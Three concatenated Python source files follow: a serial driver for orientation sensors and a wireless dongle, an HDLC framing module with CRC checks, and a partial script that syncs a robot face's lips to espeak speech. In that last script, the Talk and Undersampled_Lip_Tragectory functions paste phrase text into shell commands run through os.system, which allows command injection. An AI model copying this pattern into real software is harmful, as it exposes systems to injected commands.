self.wireless_table[i] = tmp_id
else:
self.f7WriteRead('_setSerialNumberAtLogicalID', (i, 0))
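# _setupProtocolHeader forces the dongle's wired and wireless response header bitfields
# to match the generated protocol byte, re-reading both once and raising if they still
# disagree.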
def _setupProtocolHeader(self, success_failure=False,
timestamp=False,
command_echo=False,
checksum=False,
logical_id=False,
serial_number=False,
data_length=False):
protocol_header =_generateProtocolHeader( success_failure,
timestamp,
command_echo,
checksum,
logical_id,
serial_number,
data_length)
protocol_byte, self.header_parse, self.header_idx_lst = protocol_header
d_header = self.f7WriteRead('_getWiredResponseHeaderBitfield')
dwl_header = self.f7WriteRead('_getWirelessResponseHeaderBitfield')
if d_header != protocol_byte or dwl_header != protocol_byte:
self.f7WriteRead('_setWiredResponseHeaderBitfield', protocol_byte)
self.f7WriteRead('_setWirelessResponseHeaderBitfield', protocol_byte)
d_header = self.f7WriteRead('_getWiredResponseHeaderBitfield')
dwl_header = self.f7WriteRead('_getWirelessResponseHeaderBitfield')
if d_header != protocol_byte or dwl_header != protocol_byte:
print("!!!!!fail d_header={0}, dwl_header={1}, protocol_header_byte={2}".format(d_header, dwl_header, protocol_byte))
raise Exception
# Wireless Old Protocol WriteRead
def f8WriteRead(self, logical_id, command, input_list=None):
command_args = self.command_dict[command]
cmd_byte, out_len, out_struct, in_len, in_struct, compatibility = command_args
packed_data = None
if in_struct:
if type(input_list) in (list, tuple):
packed_data = struct.pack(in_struct, *input_list)
else:
packed_data = struct.pack(in_struct, input_list)
write_array = makeWriteArray(0xf8, logical_id, cmd_byte, packed_data)
self.serial_port.write(write_array)
rtn_list = []
output_data = self.serial_port.read(2)
if len(output_data) == 2:
fail_byte = struct.unpack('>B', output_data[0])[0]
logical_id_byte = struct.unpack('>B', output_data[1])[0]
rtn_list.append(fail_byte)
if not fail_byte:
self.serial_port.read(1)
else:
return True
if out_struct:
output_data = self.serial_port.read(out_len)
rtn_list.append(struct.unpack(out_struct, output_data))
if len(rtn_list) != 1:
return rtn_list
return rtn_list[0]
return True
## Wireless New Protocol WriteRead
def faWriteRead(self, logical_id, command, input_list=None):
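# Returns a (fail_byte, timestamp, data) tuple like the wired writeRead calls; fail_byte
# is truthy on any failure (write timeout, wrong logical id, or mismatched command echo).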
global global_counter
command_args = self.wl_command_dict[command]
cmd_byte, out_len, out_struct, in_len, in_struct, compatibility = command_args
if self.compatibility < compatibility:
raise Exception("Firmware for device on ( %s ) is out of date for this function. Recommend updating to latest firmware." % self.serial_port.name)
packed_data = None
if in_struct:
if type(input_list) in (list, tuple):
packed_data=struct.pack(in_struct, *input_list)
else:
packed_data=struct.pack(in_struct, input_list)
write_array = makeWriteArray(0xfa, logical_id, cmd_byte, packed_data)
while len(self.read_queue) > 15:
_print("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!too many commands!!!!!")
time.sleep(0.01)
self.read_lock.acquire()
uid = global_counter
global_counter += 1
try:
self.serial_port.write(write_array) # release in reader thread
except serial.SerialTimeoutException:
self.read_lock.release()
self.serial_port.close()
# _print("SerialTimeoutException!!!!")
return (True, None, None)
except ValueError:
try:
# _print("trying to open it back up!!!!")
self.serial_port.open()
# _print("aaand open!!!!")
except serial.SerialException:
self.read_lock.release()
# _print("SerialTimeoutException!!!!")
return (True, None, None)
queue_packet = (uid, cmd_byte)
timeout_time = 0.5 + (len(self.read_queue) * 0.150) # timeout increases as queue gets larger
self.read_queue.append(queue_packet)
start_time = time.clock() + timeout_time
read_data = None
while(timeout_time > 0):
self.read_lock.wait(timeout_time)
read_data = self.read_dict.get(uid, None)
if read_data is not None:
break
timeout_time =start_time -time.clock()
# _print("Still waiting {0} {1} {2} {3}".format(uid, command,logical_id, timeout_time))
else:
# _print("Operation timed out!!!!")
try:
self.read_queue.remove(queue_packet)
except:
traceback.print_exc()
self.read_lock.release()
return (True, None, None)
self.read_lock.release()
del self.read_dict[uid]
header_list, output_data = read_data
fail_byte, timestamp, cmd_echo, ck_sum, rtn_log_id, sn, data_size = header_list
# _print("RESponse {0} {1} {2} {3}".format(uid, command,logical_id, timeout_time))
if logical_id != rtn_log_id:
# _print("!!!!!!!!logical_id != rtn_log_id!!!!!")
# _print(header_list)
# _hexDump(output_data, 'o')
# _print('!!!!!inWaiting = {0}'.format(self.serial_port.inWaiting()))
return (True, timestamp, None)
if cmd_echo != cmd_byte:
# _print("!!!!!!!!cmd_echo!=cmd_byte!!!!!")
# _print('cmd_echo= 0x{0:02x} cmd_byte= 0x{1:02x}'.format(cmd_echo, cmd_byte))
# _print(header_list)
# _hexDump(output_data, 'o')
# _print('!!!!!inWaiting = {0}'.format(self.serial_port.inWaiting()))
# _print('!!!!!!end')
return (True, timestamp, None)
rtn_list = None
if not fail_byte:
if out_struct:
rtn_list = struct.unpack(out_struct, output_data)
if len(rtn_list) == 1:
rtn_list = rtn_list[0]
elif cmd_echo == 0x54:
rtn_list = self[logical_id].stream_parse.unpack(output_data)
if len(rtn_list) == 1:
rtn_list = rtn_list[0]
else:
# _print("fail_byte!!!!triggered")
pass
self._read_data = None
return (fail_byte, timestamp, rtn_list)
def __getitem__(self, idx):
hw_id = self.wireless_table[idx]
if hw_id == 0:
return None
# Check if sensor exists.
if hw_id in global_sensorlist:
rtn_inst = global_sensorlist[hw_id]
if rtn_inst.dongle is self:
return rtn_inst
elif rtn_inst.dongle is None:
_print("updating sensor {0:08X} to be wireless".format(hw_id))
return TSWLSensor(timestamp_mode=self.timestamp_mode, dongle=self, logical_id=idx)
return None
# Else, make a new TSWLSensor
else:
_print("making new sensor {0:08X}".format(hw_id))
return TSWLSensor(timestamp_mode=self.timestamp_mode, dongle=self, logical_id=idx)
def getSensorFromDongle(self, idx):
return self.__getitem__(idx)
def setSensorToDongle(self, idx, hw_id):
other_hw_id = self.wireless_table[idx]
if other_hw_id != 0:
if other_hw_id in global_sensorlist:
other_sens = global_sensorlist[other_hw_id]
other_sens.dongle = None
other_sens.logical_id = None
if hw_id not in self.wireless_table:
if hw_id in global_sensorlist:
sensor = global_sensorlist[hw_id]
sensor.dongle = None
sensor.logical_id = None
self.setSerialNumberAtLogicalID(idx, hw_id)
else:
if other_hw_id != hw_id:
other_idx = self.wireless_table.index(hw_id)
self.setSerialNumberAtLogicalID(other_idx, 0)
self.setSerialNumberAtLogicalID(idx, hw_id)
return self.__getitem__(idx)
elif hw_id != 0:
self.setSerialNumberAtLogicalID(idx, hw_id)
return self.__getitem__(idx)
def _dataReadLoop(self):
while self.data_loop:
try:
self._readDataWirelessProHeader()
except(KeyboardInterrupt):
print('\n! Received keyboard interrupt, quitting threads.\n')
raise KeyboardInterrupt # fix bug where a thread eats the interrupt
break
except:
# traceback.print_exc()
# _print("bad _parseStreamData parse")
# _print('!!!!!inWaiting = {0}'.format(self.serial_port.inWaiting()))
try:
self.read_lock.release()
except:
pass
def _readDataWirelessProHeader(self):
_serial_port = self.serial_port
# in_wait = _serial_port.inWaiting()
# if in_wait:
# _print('!1025! inWaiting = {0}'.format(in_wait))
header_bytes = _serial_port.read(self.header_parse.size)
if header_bytes:
# _hexDump(header_bytes, 'o')
if self.timestamp_mode == TSS_TIMESTAMP_SENSOR:
header_data = self.header_parse.unpack(header_bytes)
header_list = padProtocolHeader87(header_data)
elif self.timestamp_mode == TSS_TIMESTAMP_SYSTEM:
sys_timestamp = time.clock() # time packet was parsed it might been in the system buffer a few ms
sys_timestamp *= 1000000
header_data = self.header_parse.unpack(header_bytes)
header_list = padProtocolHeader85(header_data, sys_timestamp)
else:
header_data = self.header_parse.unpack(header_bytes)
header_list = padProtocolHeader85(header_data, None)
fail_byte, timestamp, cmd_echo, ck_sum, rtn_log_id, sn, data_size = header_list
# _print("!!!!fail_byte={0}, cmd_echo={1}, rtn_log_id={2}, data_size={3}".format(fail_byte, cmd_echo, rtn_log_id, data_size))
output_data = _serial_port.read(data_size)
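# A command echo of 0xff marks asynchronous streaming data rather than a reply to a
# queued command, so it is routed to the owning sensor's stream parser instead.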
if cmd_echo == 0xff:
if data_size:
self[rtn_log_id]._parseStreamData(timestamp, output_data)
return
self.read_lock.acquire()
# _print('retrning data!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
if len(self.read_queue): # here for a bug in the code
uid, cmd_byte = self.read_queue.popleft()
if cmd_byte == cmd_echo:
self.read_dict[uid] = (header_list, output_data)
self.read_lock.notifyAll() # dies in 3 seconds if there is a writeRead in wait
else:
# _print('Unrequested packet found!!!')
# _hexDump(header_bytes, 'o')
# _hexDump(output_data, 'o')
self.read_queue.appendleft((uid, cmd_byte))
self.read_lock.release()
return
# _print('Unrequested packet found (read_queue is empty)!!!')
# _hexDump(header_bytes, 'o')
# _hexDump(output_data, 'o')
# _print("no status bytes")
self.read_lock.release()
## 209(0xd1)
def setSerialNumberAtLogicalID(self, logical_id, serial_number, timestamp=False):
arg_list = (logical_id, serial_number)
fail_byte, t_stamp, data = self.writeRead('_setSerialNumberAtLogicalID', arg_list)
if not fail_byte:
self.wireless_table[logical_id] = serial_number
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## generated functions DNG
## 176(0xb0)
def setWirelessStreamingAutoFlushMode(self, mode, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setWirelessStreamingAutoFlushMode', mode)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 177(0xb1)
def getWirelessStreamingAutoFlushMode(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getWirelessStreamingAutoFlushMode')
if timestamp:
return (data, t_stamp)
return data
## 182(0xb6)
def broadcastSynchronizationPulse(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('broadcastSynchronizationPulse')
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 183(0xb7)
def getReceptionBitfield(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getReceptionBitfield')
if timestamp:
return (data, t_stamp)
return data
## 192(0xc0)
def getWirelessPanID(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getWirelessPanID')
if timestamp:
return (data, t_stamp)
return data
## 193(0xc1)
def setWirelessPanID(self, PanID, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setWirelessPanID', PanID)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 194(0xc2)
def getWirelessChannel(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getWirelessChannel')
if timestamp:
return (data, t_stamp)
return data
## 195(0xc3)
def setWirelessChannel(self, channel, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setWirelessChannel', channel)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 197(0xc5)
def commitWirelessSettings(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('commitWirelessSettings')
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 198(0xc6)
def getWirelessAddress(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getWirelessAddress')
if timestamp:
return (data, t_stamp)
return data
## 208(0xd0)
def getSerialNumberAtLogicalID(self, logical_id, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getSerialNumberAtLogicalID', logical_id)
if timestamp:
return (data, t_stamp)
return data
## 210(0xd2)
def getWirelessChannelNoiseLevels(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getWirelessChannelNoiseLevels')
if timestamp:
return (data, t_stamp)
return data
## 211(0xd3)
def setWirelessRetries(self, retries, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setWirelessRetries', retries)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 212(0xd4)
def getWirelessRetries(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getWirelessRetries')
if timestamp:
return (data, t_stamp)
return data
## 213(0xd5)
def getWirelessSlotsOpen(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getWirelessSlotsOpen')
if timestamp:
return (data, t_stamp)
return data
## 214(0xd6)
def getSignalStrength(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getSignalStrength')
if timestamp:
return (data, t_stamp)
return data
## 215(0xd7)
def setWirelessHIDUpdateRate(self, update_rate, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setWirelessHIDUpdateRate', update_rate)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 216(0xd8)
def getWirelessHIDUpdateRate(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getWirelessHIDUpdateRate')
if timestamp:
return (data, t_stamp)
return data
## 217(0xd9)
def setWirelessHIDAsynchronousMode(self, mode, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setWirelessHIDAsynchronousMode', mode)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 218(0xda)
def getWirelessHIDAsynchronousMode(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getWirelessHIDAsynchronousMode')
if timestamp:
return (data, t_stamp)
return data
## 240(0xf0)
def setJoystickLogicalID(self, logical_id, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setJoystickLogicalID', logical_id)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 241(0xf1)
def setMouseLogicalID(self, logical_id, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setMouseLogicalID', logical_id)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 242(0xf2)
def getJoystickLogicalID(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getJoystickLogicalID')
if timestamp:
return (data, t_stamp)
return data
## 243(0xf3)
def getMouseLogicalID(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getMouseLogicalID')
if timestamp:
return (data, t_stamp)
return data
## END generated functions DNG
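# Example (sketch): opening a dongle on an assumed port and fetching the wireless sensor
# paired at logical ID 0 (indexing returns None when the slot is empty).
#     dongle = TSDongle(com_port='COM5')
#     if dongle is not None:
#         sensor = dongle[0]
#         if sensor is not None:
#             print(sensor.getUntaredOrientationAsEulerAngles())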
class TSEMSensor(_TSSensor):
command_dict = _TSSensor.command_dict.copy()
command_dict.update({
'setPinMode': (0x1d, 0, None, 2, '>BB', 1),
'getPinMode': (0x1e, 2, '>BB', 0, None, 1),
'getInterruptStatus': (0x1f, 1, '>B', 0, None, 1),
'_setUARTBaudRate': (0xe7, 0, None, 4, '>I', 1),
'getUARTBaudRate': (0xe8, 4, '>I', 0, None, 1)
})
reverse_command_dict = dict(map(lambda x: [x[1][0], x[0]], command_dict.items()))
_device_types = ["EM", "EM-HH"]
def __new__(cls, com_port=None, baudrate=_baudrate, timestamp_mode=TSS_TIMESTAMP_SENSOR):
if com_port is None:
return None
if com_port:
if type(com_port) is str:
port_name = com_port
elif type(com_port) is ComInfo:
port_name = com_port.com_port
else:
_print("An erronous parameter was passed in")
return None
if baudrate not in _allowed_baudrates:
baudrate = _baudrate
_print("Error baudrate value not allowed. Using default.")
serial_port = serial.Serial(port_name, baudrate=baudrate, timeout=0.5, writeTimeout=0.5)
if serial_port is not None:
new_inst = super(_TSSensor, cls).__new__(cls)
serial_port.write(bytearray((0xf7, 0x56, 0x56)))
time.sleep(0.01)
serial_port.flushInput()
return _generateSensorClass(new_inst, serial_port, TSEMSensor._device_types)
_print('Error: serial port was not created')
## 231(0xe7)
def setUARTBaudRate(self, baud_rate, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('_setUARTBaudRate', baud_rate)
if not fail_byte:
self.baudrate = baud_rate
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## generated functions EM_
## 29(0x1d)
def setPinMode(self, mode, pin, timestamp=False):
arg_list = (mode, pin)
fail_byte, t_stamp, data = self.writeRead('setPinMode', arg_list)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 30(0x1e)
def getPinMode(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getPinMode')
if timestamp:
return (data, t_stamp)
return data
## 31(0x1f)
def getInterruptStatus(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getInterruptStatus')
if timestamp:
return (data, t_stamp)
return data
## 232(0xe8)
def getUARTBaudRate(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getUARTBaudRate')
if timestamp:
return (data, t_stamp)
return data
## END generated functions EM_
class TSDLSensor(_TSSensor):
command_dict = _TSSensor.command_dict.copy()
command_dict.update({
'turnOnMassStorage': (0x39, 0, None, 0, None, 1),
'turnOffMassStorage': (0x3a, 0, None, 0, None, 1),
'formatAndInitializeSDCard': (0x3b, 0, None, 0, None, 1),
'beginDataLoggingSession': (0x3c, 0, None, 0, None, 1),
'endDataLoggingSession': (0x3d, 0, None, 0, None, 1),
'setClockValues': (0x3e, 0, None, 6, '>6B', 1),
'getClockValues': (0x3f, 6, '>6B', 0, None, 1),
'getBatteryVoltage': (0xc9, 4, '>f', 0, None, 1),
'getBatteryPercentRemaining': (0xca, 1, '>B', 0, None, 1),
'getBatteryStatus': (0xcb, 1, '>B', 0, None, 1),
'getButtonState': (0xfa, 1, '>B', 0, None, 1)
})
reverse_command_dict = dict(map(lambda x: [x[1][0], x[0]], command_dict.items()))
_device_types = ["DL", "DL-HH"]
def __new__(cls, com_port=None, baudrate=_baudrate, timestamp_mode=TSS_TIMESTAMP_SENSOR):
if com_port is None:
return None
if com_port:
if type(com_port) is str:
port_name = com_port
elif type(com_port) is ComInfo:
port_name = com_port.com_port
else:
_print("An erronous parameter was passed in")
return None
if baudrate not in _allowed_baudrates:
baudrate = _baudrate
_print("Error baudrate value not allowed. Using default.")
serial_port = serial.Serial(port_name, baudrate=baudrate, timeout=0.5, writeTimeout=0.5)
if serial_port is not None:
new_inst = super(_TSSensor, cls).__new__(cls)
serial_port.write(bytearray((0xf7, 0x56, 0x56)))
time.sleep(0.01)
serial_port.flushInput()
return _generateSensorClass(new_inst, serial_port, TSDLSensor._device_types)
_print('Error: serial port was not created')
## generated functions DL_
## 57(0x39)
def turnOnMassStorage(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('turnOnMassStorage')
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 58(0x3a)
def turnOffMassStorage(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('turnOffMassStorage')
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 59(0x3b)
def formatAndInitializeSDCard(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('formatAndInitializeSDCard')
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 60(0x3c)
def beginDataLoggingSession(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('beginDataLoggingSession')
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 61(0x3d)
def endDataLoggingSession(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('endDataLoggingSession')
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 62(0x3e)
def setClockValues(self, month, day, year, hour, minute, second, timestamp=False):
arg_list = (month, day, year, hour, minute, second)
fail_byte, t_stamp, data = self.writeRead('setClockValues', arg_list)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 63(0x3f)
def getClockValues(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getClockValues')
if timestamp:
return (data, t_stamp)
return data
## 201(0xc9)
def getBatteryVoltage(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getBatteryVoltage')
if timestamp:
return (data, t_stamp)
return data
## 202(0xca)
def getBatteryPercentRemaining(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getBatteryPercentRemaining')
if timestamp:
return (data, t_stamp)
return data
## 203(0xcb)
def getBatteryStatus(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getBatteryStatus')
if timestamp:
return (data, t_stamp)
return data
## 250(0xfa)
def getButtonState(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getButtonState')
if timestamp:
return (data, t_stamp)
return data
## END generated functions DL_
class TSBTSensor(_TSSensor):
command_dict = _TSSensor.command_dict.copy()
command_dict.update({
'getBatteryVoltage': (0xc9, 4, '>f', 0, None, 1),
'getBatteryPercentRemaining': (0xca, 1, '>B', 0, None, 1),
'getBatteryStatus': (0xcb, 1, '>B', 0, None, 1),
'_setUARTBaudRate': (0xe7, 0, None, 4, '>I', 1),
'getUARTBaudRate': (0xe8, 4, '>I', 0, None, 1),
'getButtonState': (0xfa, 1, '>B', 0, None, 1)
})
reverse_command_dict = dict(map(lambda x: [x[1][0], x[0]], command_dict.items()))
_device_types = ["BT", "BT-HH"]
def __new__(cls, com_port=None, baudrate=_baudrate, timestamp_mode=TSS_TIMESTAMP_SENSOR):
if com_port is None:
return None
if com_port:
if type(com_port) is str:
port_name = com_port
elif type(com_port) is ComInfo:
port_name = com_port.com_port
else:
_print("An erronous parameter was passed in")
return None
if baudrate not in _allowed_baudrates:
baudrate = _baudrate
_print("Error baudrate value not allowed. Using default.")
serial_port = serial.Serial(port_name, baudrate=baudrate, timeout=2.5, writeTimeout=2.5)
if serial_port is not None:
new_inst = super(_TSSensor, cls).__new__(cls)
serial_port.write(bytearray((0xf7, 0x56, 0x56)))
time.sleep(0.25)
serial_port.flushInput()
return _generateSensorClass(new_inst, serial_port, TSBTSensor._device_types)
_print('Error: serial port was not created')
## 231(0xe7)
def setUARTBaudRate(self, baud_rate, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('_setUARTBaudRate', baud_rate)
if not fail_byte:
self.baudrate = baud_rate
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## generated functions BT_
## 201(0xc9)
def getBatteryVoltage(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getBatteryVoltage')
if timestamp:
return (data, t_stamp)
return data
## 202(0xca)
def getBatteryPercentRemaining(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getBatteryPercentRemaining')
if timestamp:
return (data, t_stamp)
return data
## 203(0xcb)
def getBatteryStatus(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getBatteryStatus')
if timestamp:
return (data, t_stamp)
return data
## 232(0xe8)
def getUARTBaudRate(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getUARTBaudRate')
if timestamp:
return (data, t_stamp)
return data
## 250(0xfa)
def getButtonState(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getButtonState')
if timestamp:
return (data, t_stamp)
return data
## END generated functions BT_
global_broadcaster= Broadcaster()
|
simple_hdlc.py
|
#!/usr/bin/python
# coding: utf8
__version__ = '0.3'
import logging
import struct
import time
import six
import binascii
from threading import Thread
from PyCRC.CRCCCITT import CRCCCITT
logger = logging.getLogger(__name__)
ESCAPE_CHAR = 0x7d
END_CHAR = 0x7e
ESCAPE_MASK = 0x20
MAX_FRAME_LENGTH = 1024
def bin_to_hex(b):
if six.PY2:
return b.encode("hex")
return b.hex()
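# CRC-CCITT (0xFFFF seed) over the raw payload, packed big-endian; the two CRC bytes are
# appended to every frame before escaping and verified again on receive.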
def calcCRC(data):
crc = CRCCCITT("FFFF").calculate(six.binary_type(data))
b = bytearray(struct.pack(">H", crc))
return b
class Frame(object):
STATE_READ = 0x01
STATE_ESCAPE = 0x02
def __init__(self):
self.finished = False
self.error_message = None
self.error = False
self.state = self.STATE_READ
self.data = bytearray()
self.crc = bytearray()
self.reader = None
def __len__(self):
return len(self.data)
def reset(self):
self.data = bytearray()
self.finished = False
self.error = False
self.state = self.STATE_READ
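# Feed one received byte into the frame state machine: 0x7e delimits frames, 0x7d escapes
# the next byte (which is XORed with 0x20), and a frame only finishes once at least three
# bytes (payload plus two CRC bytes) have been collected. Returns True when a frame is
# complete or aborted, False while more bytes are needed.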
def addByte(self, b):
if b == END_CHAR:
logger.debug("frame start")
if self.state == self.STATE_ESCAPE:
return self.abort("invalid framing (got end in escapemode)")
else:
# maybe finished
if len(self.data) >= 3:
return self.finish()
return False
if self.state == self.STATE_ESCAPE:
self.state = self.STATE_READ
b = b ^ ESCAPE_MASK
elif (b == ESCAPE_CHAR):
self.state = self.STATE_ESCAPE
return False
self.data.append(b)
if len(self.data) > MAX_FRAME_LENGTH:
return self.abort("frame to big")
return False
def finish(self):
res = self._checkCRC()
self.crc = self.data[-2:]
self.data = self.data[:-2]
if res:
self.error = False
self.finished = True
return True
return self.abort("Invalid Frame (CRC FAIL)")
def abort(self, message):
self.error = True
self.finished = True
self.error_message = message
return True
def _checkCRC(self):
data_without_crc = self.data[:-2]
crc = self.data[-2:]
res = bool(crc == calcCRC(data_without_crc))
if not res:
c1 = six.binary_type(crc)
c2 = six.binary_type(calcCRC(data_without_crc))
logger.warning("invalid crc %s != %s <- our calculation", bin_to_hex(c1), bin_to_hex(c2))
return res
def toString(self):
return six.binary_type(self.data)
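# Worked framing example (illustrative, derived from the constants above):
# a payload byte equal to END_CHAR (0x7e) or ESCAPE_CHAR (0x7d) is transmitted
# as ESCAPE_CHAR followed by the byte XOR'd with ESCAPE_MASK (0x20), so
#   0x7e -> 0x7d 0x5e
#   0x7d -> 0x7d 0x5d
# Frame.addByte() reverses this transformation while receiving.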
class HDLC(object):
def __init__(self, serial, reset=True):
self.serial = serial
self.current_frame = None
self.last_frame = None
self.frame_callback = None
self.error_callback = None
self.running = False
logger.debug("HDLC INIT: %s bytes in buffer", self.serial.in_waiting)
if reset:
self.serial.reset_input_buffer()
@classmethod
def toBytes(cls, data):
return bytearray(data)
def sendFrame(self, data):
bs = self._encode(self.toBytes(data))
logger.info("Sending Frame: %s", bin_to_hex(bs))
res = self.serial.write(bs)
logger.info("Send %s bytes", res)
def _onFrame(self, frame):
self.last_frame = frame
s = self.last_frame.toString()
logger.info("Received Frame: %s", bin_to_hex(s))
if self.frame_callback is not None:
self.frame_callback(s)
def _onError(self, frame):
self.last_frame = frame
s = self.last_frame.toString()
logger.warning("Frame Error: %s", bin_to_hex(s))
if self.error_callback is not None:
self.error_callback(s)
def _readBytes(self, size):
cnt = 0
while cnt < size:
b = six.binary_type(self.serial.read(1))
if len(b) < 1:
return False
cnt += len(b)
res = self._readByte(six.byte2int(b))
if res:
return True
def _readByte(self, b):
assert 0 <= b <= 255
if not self.current_frame:
self.current_frame = Frame()
res = self.current_frame.addByte(b)
if res:
if self.current_frame.error:
self._onError(self.current_frame)
self.current_frame = None
else:
self._onFrame(self.current_frame)
self.current_frame = None
return res
def readFrame(self, timeout=5):
timer = time.time() + timeout
while time.time() < timer:
i = self.serial.in_waiting
if i < 1:
time.sleep(0.0001)
continue
res = self._readBytes(i)
if res:
if self.last_frame.finished:
if not self.last_frame.error:
# Success
s = self.last_frame.toString()
return s
# error
raise ValueError(self.last_frame.error_message)
raise RuntimeError("Unexpected Framing Error")
raise RuntimeError("readFrame timeout")
@classmethod
def _encode(cls, bs):
data = bytearray()
data.append(0x7E)
crc = calcCRC(bs)
bs = bs + crc
for byte in bs:
if byte == 0x7E or byte == 0x7D:
data.append(0x7D)
data.append(byte ^ 0x20)
else:
data.append(byte)
data.append(0x7E)
return bytes(data)
def _receiveLoop(self):
while self.running:
i = self.serial.in_waiting
if i < 1:
time.sleep(0.001)
continue
res = self._readBytes(i)
def startReader(self, onFrame, onError=None):
if self.running:
raise RuntimeError("reader already running")
self.reader = Thread(target=self._receiveLoop)
self.reader.setDaemon(True)
self.frame_callback = onFrame
self.error_callback = onError
self.running = True
self.reader.start()
def stopReader(self):
self.running = False
self.reader.join()
self.reader = None
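# Hedged usage sketch (assumes a pyserial port; the device path is illustrative):
#   import serial
#   port = serial.Serial("/dev/ttyUSB0", 115200, timeout=0)
#   hdlc = HDLC(port)
#   hdlc.sendFrame(b"\x01\x02\x03")     # wraps the payload with a CRC and 0x7e delimiters
#   data = hdlc.readFrame(timeout=5)    # blocking poll; raises RuntimeError on timeout
#   hdlc.startReader(onFrame=print)     # or consume frames on a background thread
#   hdlc.stopReader()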
|
threads5.py
|
import numpy as np
from threading import Thread, Event
import face
from time import sleep, time
import os
from scipy.io import wavfile
from scipy.ndimage.filters import maximum_filter1d,gaussian_filter
import matplotlib.pyplot as plt
from nltk.tokenize import sent_tokenize
import string
#download nltk punkt in order to complete nltk set-up
#nltk.download()
roboFace = face.Face(x_weight=0.8, y_weight=0.2)
def Undersampled_Lip_Tragectory(phrase,Sleep_Time):
A ="espeak -z -s 100 -v female5 -w test.wav "
A=A + "'" + phrase + "'"
os.system(A)
samplerate, data = wavfile.read('test.wav')
dt=1/float(samplerate)
times = np.arange(len(data))/float(samplerate)
N=len(times)
max_data=maximum_filter1d(data,size=1000)
max_data=gaussian_filter(max_data,sigma=100)
max_Amplitude=10
Amplitude=max_Amplitude*(max_data/float(np.max(max_data)))
n=Sleep_Time*samplerate
Amp=[]
T=[]
i=0
while (i*n<N):
Amp.append(Amplitude[int(i*n)])
T.append(times[int(i*n)])
i=i+1
Amp=np.array(Amp)
T=np.array(T)
'''
plt.figure(1)
plt.suptitle(phrase)
plt.subplot(211)
plt.plot(times,data)
plt.plot(times,max_data,'r')
plt.subplot(212)
plt.plot(times,Amplitude)
plt.plot(T,Amp,'r*')
plt.show()
'''
return Amp,T
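# Undersampling arithmetic (illustrative numbers, assuming espeak writes a
# 22050 Hz WAV): with Sleep_Time = 0.05 s, n = 0.05 * 22050 = 1102.5, so one
# lip amplitude is kept roughly every 1102 audio samples, i.e. about 20 mouth
# updates per second.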
def MoveLips(Sleep_Time, Amplitude, flag):
roboFace.setSpeedLips(127)
i=0
while flag.isSet() and i < len(Amplitude):
roboFace.moveLips(int(Amplitude[i]))
sleep(Sleep_Time)
i = i + 1
if not flag.isSet():
roboFace.moveLips(0)
sleep(0.05)
def Talk(phrase, flag):
A = "espeak -z -s 100 -v female5 "
A = A + "'" + phrase + "'"
os.system(A)
flag.clear()
def Say(text):
phrases=sent_tokenize(text)
for phrase in phrases:
phrase=phrase.replace("'"," ")
